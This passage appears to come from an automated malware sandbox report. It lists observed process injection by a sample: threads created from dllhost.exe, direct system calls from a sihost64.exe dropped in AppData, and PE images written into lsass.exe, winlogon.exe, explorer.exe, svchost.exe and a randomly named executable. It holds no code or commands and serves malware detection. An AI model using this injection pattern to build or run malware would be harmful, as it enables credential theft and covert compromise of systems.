        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12225AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7825AC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C22F2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB972EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E91B2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31C92EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD1B2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D43C2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6DC2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29E72EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43A62EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB372EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31822EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3642EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EA12EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2EBE2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 96452EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A0382EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F392EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF032EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\cmd.exe EIP: D2922EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\conhost.exe EIP: EE52EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B8A2EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BA02EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EDA52EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B5252EBC
        Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B5252EBC
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtCreateThreadEx: Direct from: 0x401A17
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtWriteVirtualMemory: Direct from: 0x401D57
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtProtectVirtualMemory: Direct from: 0x401DD7
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtClose: Direct from: 0x401CD7
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtAllocateVirtualMemory: Direct from: 0x401D97
        Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC60380000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 161C7340000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 233B91B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 210918F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2062E960000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282B8D70000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22856DC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207BAC00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27A01800000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2992B230000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23227590000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28098F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23ACD780000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F1C1330000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192A4090000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5112C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2848B1D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A12F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D8115C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C8B4690000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 213C6680000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: B80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25B905C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2905A8E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A5FA180000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19296180000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24ED0B70000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20955300000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B054660000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15D00D80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20983090000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 278CACC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DAE2270000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 284FF340000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22687920000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B661F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DD637D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 29E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2081CC80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23263180000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2064B670000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F535400000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 149A8F80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115780000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29204CE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A0126F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 251F17A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 690000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F30000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1010000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 600000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E80000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 540000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D90000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1450000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D60000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C70000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: B00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 720000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 740000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D00000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1350000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 840000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 960000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 500000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BE0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E30000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1460000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 750000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 6C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1130000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: A10000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1250000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C20000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 620000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C40000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000 value starts with: 4D5A
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1C0000 value starts with: 4D5A
